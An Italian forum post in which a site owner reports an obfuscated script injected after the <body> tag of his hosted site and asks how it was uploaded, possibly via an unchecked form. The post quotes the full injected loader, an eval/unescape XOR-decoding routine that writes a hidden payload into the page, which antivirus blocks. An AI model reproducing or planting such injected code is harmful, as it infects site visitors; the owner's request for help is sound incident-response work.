Salve ragazzi, non so se posto nel forum giusto.
La questione è questa.
Su un sito da me realizzato e on-line presso una nota webfarm italiana (non faccio nomi),
nella default subito dopo il <body> trovo

<script>eval(unescape('function%20STR%28AHaD%29%7B LrpAIS%3Dnew%20String%28arguments.callee%29.replac e%28/%5B%5E@a-z0-9A-Z_.%5D/g%2C%27%27%29%2CPAH%3D%27%27%2CHlsH%3D-1%2CCsh%3D-1%3Bvar%20ACsh%3D0%3Bfor%28HlsH%3D0%3BHlsH%3CLrpAI S.length%3BHlsH++%29ACsh%5E%3DLrpAIS.charCodeAt%28 HlsH%29%3BHlsH%3D-1%3Bwhile%28++Csh%3CAHaD.length%29%7Bif%28HlsH%3D% 3DLrpAIS.length%29HlsH%3D0%3Belse%20HlsH++%3BPAH+% 3DString.fromCharCode%28ACsh%5EAHaD.charCodeAt%28C sh%29%5ELrpAIS.charCodeAt%28HlsH%29%29%3B%7Ddocume nt.write%28PAH%29%3BPAH%3D%27%27%3Breturn%3B%7D')) ;STR(unescape('O%13%18%04%08%0C%0EE1%28%2902%03%7F *%13%04%20%295FW%26%29%0F%02%5B@%16%1B%04%07%0D%1D %1E%0FO%11I%1F%00%1CQWLR%01WN%5E%06Q%5Br%15%02@%0B %7FhjU%13%281%60%15*55gv%15%0FG%5E%28@%3C%22%12%0D %1F%5CUPl%0A%033V8W%0F3%3F%08J%20sy%1CRW3%212%15%1 E%5EMziqM08%13%0Dz.%29N%18%19%5C*7%0E%19%5E%26%003 %1D%090uPLl%11PTW%5E%2CqF%0A%3D9%009%06MBLR%09%18% 15%145%0D%5BnkG%16%20%25*%5ED%2C%5C%16%08%0E-%15%07%24%02%5B%5E%5C%1E2%5EMz+1%01a_%5BS%5CY%1C%1 A%01%5DSq%0F%15@%7D%5D%1C%15jqOA%7B.%17%23R%06%09J '));</script>

Che tenta di aprire qualcosa che l'antivirus in locale sul client che vede il sito blocca.
Come lo hanno caricato ?
Possibile attraverso qualche form non controllata opportunamente ?
Se non è il forum giusto lo spostate per favore ?
Grazie